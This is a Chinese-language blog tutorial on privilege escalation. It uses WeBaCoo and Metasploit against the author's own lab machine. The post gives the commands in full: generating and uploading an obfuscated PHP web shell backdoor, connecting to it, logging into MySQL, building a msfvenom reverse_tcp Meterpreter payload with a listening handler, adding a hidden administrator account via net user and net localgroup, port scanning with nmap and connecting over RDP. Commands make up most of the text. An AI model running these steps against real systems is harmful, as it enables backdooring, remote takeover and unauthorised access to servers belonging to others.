提权技巧

metasploit提权小计

字号+ 作者:i春秋研习社 来源:转载 2017-03-09 14:10 我要评论( )

本次测试工具有两种一种是metasploit 一种是Webacoo对于metasploit来说各位老司机们或者都很熟悉 但是你真的会熟练的用它嘛 ? WeBaCoo (Web Backdoor Cookie) scr......

本次测试工具有两种  一种是metasploit 一种是Webacoo  对于metasploit来说  各位老司机们或者都很熟悉 但是你真的会熟练的用它嘛 ?
WeBaCoo (Web Backdoor Cookie) script-kit是一个小巧的、隐蔽的php后门,它提供了一个可以连接远程web服务器并执行php代码的终端。WeBaCoo使用HTTP响应头传送命令结果,shell命令经base64编码后隐藏在Cookie头中。

以上我们说Webacoo是一款小巧 隐藏的php后门 那么我们先来生成一个php后门 先来了解下webacoo的一些参数
我们来-h查看一下

[AppleScript] 纯文本查看 复制代码
?
1
webacoo -h

选项:
   -g生成后门代码(-o是必需的)

   -f FUNCTION PHP系统函数使用
功能
1:系统(默认)
2:shell_exec
3:exec
4:passthru
5:popen

   -o OUTPUT生成的后门输出文件名

   -r返回未模糊的后门代码

   -t建立远程“终端”连接(需要-u)

   -u URL后门URL

   -e CMD单命令执行模式(需要-t和-u)

   -m METHOD要使用的HTTP方法(默认为GET)

   -c C_NAME Cookie名称(默认值:“M-cookie”)

   -d DELIM Delimiter(默认值:每个请求的新随机)

   -a AGENT HTTP标头用户代理(默认存在)

   -p PROXY使用代理(tor,ip:port或user:pass:ip:port)

   -v级别详细级别
水平
0:无其他信息(默认)
1:打印HTTP标头
2:打印HTTP标头+数据

   -l LOG将活动记录到文件

   -h显示帮助并退出

   更新检查更新并应用(如果有)

以上是经过Google翻译过的 接着我们来生成一个php后门
[AppleScript] 纯文本查看 复制代码
?
1
root@xaiSec:~# webacoo -g -o /root/桌面/test.php


-g //生成后门代码
-o //输出的文件名
这里我吧php后门生成到桌面了
你会看到这是一个已经加密过的php后门

我本机搭建了php环境 我们来上传一下

上传成功后我们 我们来打开一下
我本机在内网中的ip地址是 192.168.0.3

打开之后你会发现什么也没有 这里我们不要慌 我们来用webacoo连接一下 嘿嘿嘿 接着你会看到一个会话

[AppleScript] 纯文本查看 复制代码
?
1
root@xaiSec:~# webacoo -t -u [url]http://192.168.0.3/test/test.php[/url]

-t //建立连接
-u  //后门地址
我们连接后来“嘿嘿一下”

load //查看模块

然后我们来连接下MySQL数据库


[AppleScript] 纯文本查看 复制代码
?
1
mysql-cli 127.0.0.1 root 123456

我本机搭建的php环境 数据库密码为123456 如下图


whoami //查看权限

webacoo$ whoami
sc-201702212241\administrator

添加一个admin用户测试一下



netstat -ano //查看所有开放端口


上传metasploit后门进行二次渗透

生成一个metasploit后门 利用msf的
handler模块进行二次渗透
[AppleScript] 纯文本查看 复制代码
?
1
2
3
4
msfvenom -p windows/meterpreter/reverse_tcp LHOST=IP  -f exe -o /root/桌面/test.exe  //生成后门
msf > use exploit/multi/handler  //使用模块
msf exploit(handler) > set lhost IP  //设置kali的ip  不知道的可以ifconfig 查看一下
msf exploit(handler) > run   //监听
msf默认端口为4444

msf设置好之后 我们用WeBaCoo把后门上传到远程服务器

[AppleScript] 纯文本查看 复制代码
?
1
upload 本地文件地址 远程文件地址  //上传文件



上传成功后 我们cmd 来使用cmd 打开msf生成的后门
这个时候你会发现你的metasploit已经成功连接

shell //反弹shell  接下来我们就各种骚提权

net user //查看用户
net user xiaoaisec  xiaoaisec /add //添加一个用户


net localgroup administrators xiaoaisec /add  //提升到管理员权限



接着我们来扫描一下开放端口
[AppleScript] 纯文本查看 复制代码
?
1
nmap 192.168.0.3

ps:为了测试 这台机子我已经打开了允许内网连接

我们在终端中来连接一下

[AppleScript] 纯文本查看 复制代码
?
1
root@xaiSec:~# rdesktop 192.168.0.3





Ps:上次忘了写连接过程 这次补上了。

本次就到这里了 大晚上的 睡不着 才写的这篇文章 觉得思路特别清晰 新手看了都会吧 . 嘿嘿
附赠提权笔记 特别全面~ 适合新手学习 提权笔记.txt

本文来自: 蜗蜗侠's Blog-关注网络安全 http://blog.icxun.cn/hack/Right/595.html

1.本站遵循行业规范,任何转载的稿件都会明确标注作者和来源;2.本站的原创文章,请转载时务必注明文章作者和来源,不尊重原创的行为我们将追究责任;3.作者投稿可能会经我们编辑修改或补充。

相关文章
网友点评
暂时未开启评论功能~